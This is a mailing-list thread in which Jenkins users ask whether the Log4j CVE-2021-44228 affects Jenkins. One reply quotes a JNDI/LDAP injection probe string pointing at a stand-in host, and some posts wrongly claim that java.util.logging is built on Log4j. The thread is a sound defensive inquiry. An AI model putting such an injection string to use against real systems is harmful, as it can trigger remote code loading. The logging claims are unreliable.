Good discussion here: https://issues.jenkins.io/browse/JENKINS-67353
On Sunday, December 12, 2021 at 12:28:09 p.m. UTC-5 [email protected] wrote: > The good news is that passing the ${jndi:ldap://example.com/a} string > through the logger does not trigger the CVE behaviour. > > On Sunday, December 12, 2021 at 11:44:35 a.m. UTC-5 [email protected] > wrote: > >> Running the script: >> println(java.util.logging.Logger.class) >> >> does indicated that Apache logger (built on top of Log4j) is present in >> the LTS version of Jenkins. >> >> On Sunday, December 12, 2021 at 11:39:55 a.m. UTC-5 [email protected] >> wrote: >> >>> Hi Kritesh, >>> >>> Thank you for this info. >>> >>> The problem with that example is that Apache java.util.logging is built >>> on top of Log4j but does not identify as such. I am not convinced that this >>> test is sufficient. >>> >>> Sincerely, >>> Randall >>> >>> On Sunday, December 12, 2021 at 11:34:15 a.m. UTC-5 [email protected] >>> wrote: >>> >>>> I am following for the same issue… found below info on community page >>>> regarding this vulnerability. >>>> >>>> https://www.jenkins.io/blog/2021/12/10/log4j2-rce-CVE-2021-44228/ >>>> >>>> >>>> Thanks & Regards, >>>> Kritesh >>>> >>>> On Sun, Dec 12, 2021 at 9:27 AM [email protected] <[email protected]> >>>> wrote: >>>> >>>>> Hi All, >>>>> >>>>> I am looking for any information relating to whether the Zero Days CVE >>>>> has any impact on Jenkins or Plugins. We do know that the >>>>> java.util.logging >>>>> is built on log4j, but do not know whether protections are in place to >>>>> prevent this vulnerability from being exploited, and where. For example, >>>>> could a command in a pipeline trigger this vulnerability. >>>>> >>>>> This is a somewhat urgent request. >>>>> >>>>> Thanks, >>>>> Randall >>>>> >>>>> -- >>>>> You received this message because you are subscribed to the Google >>>>> Groups "Jenkins Users" group. >>>>> To unsubscribe from this group and stop receiving emails from it, send >>>>> an email to [email protected]. >>>>> To view this discussion on the web visit >>>>> https://groups.google.com/d/msgid/jenkinsci-users/4e157a13-bfba-425a-81ae-b93cdd845f9dn%40googlegroups.com >>>>> >>>>> <https://groups.google.com/d/msgid/jenkinsci-users/4e157a13-bfba-425a-81ae-b93cdd845f9dn%40googlegroups.com?utm_medium=email&utm_source=footer> >>>>> . >>>>> >>>> -- You received this message because you are subscribed to the Google Groups "Jenkins Users" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/dbee95d1-4327-4466-8829-06aeb9fe607dn%40googlegroups.com.
